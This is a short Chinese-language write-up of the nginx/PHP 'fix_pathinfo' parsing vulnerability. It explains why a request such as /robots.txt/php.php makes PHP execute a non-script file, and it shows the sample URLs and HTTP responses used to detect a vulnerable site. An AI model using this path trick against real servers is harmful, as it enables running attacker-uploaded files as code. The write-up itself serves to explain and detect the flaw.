nginx解析漏洞利用
那麼假設存在一個http://www.target.com/jpg.jpg,我們以如下的方式去訪問
http://www.target.com/jpg.jpg/php.php
將會得到一個URI
/jpg.jpg/php.php
經過location指令,該請求將會交給後端的fastcgi處理,nginx爲其設置環境變量SCRIPT_FILENAME,內容爲
/scripts/jpg.jpg/php.php
而在其他的webserver如lighttpd當中,我們發現其中的SCRIPT_FILENAME被正確的設置爲
/scripts/jpg.jpg
所以不存在此問題。
後端的fastcgi在接受到該選項時,會根據fix_pathinfo配置決定是否對SCRIPT_FILENAME進行額外的處理,一般情況下如果不對fix_pathinfo進行設置將影響使用PATH_INFO進行路由選擇的應用,所以該選項一般配置開啓。Php通過該選項之後將查找其中真正的腳本文件名字,查找的方式也是查看文件是否存在,這個時候將分離出SCRIPT_FILENAME和PATH_INFO分別爲
/scripts/jpg.jpg和php.php
最後,以/scripts/jpg.jpg作爲此次請求需要執行的腳本,攻擊者就可以實現讓nginx以php來解析任何類型的文件了。
漏洞利用:訪問一個nginx來支持php的站點,在一個任何資源的文件如robots.txt後面加上/php.php,這個時候你可以看到如下的區別:
訪問http://www.target.com/robots.txt
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
|
訪問http://www.target.com/robots.txt/php.php
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6
|
其中的Content-Type的變化說明了後端負責解析的變化,該站點就可能存在漏洞。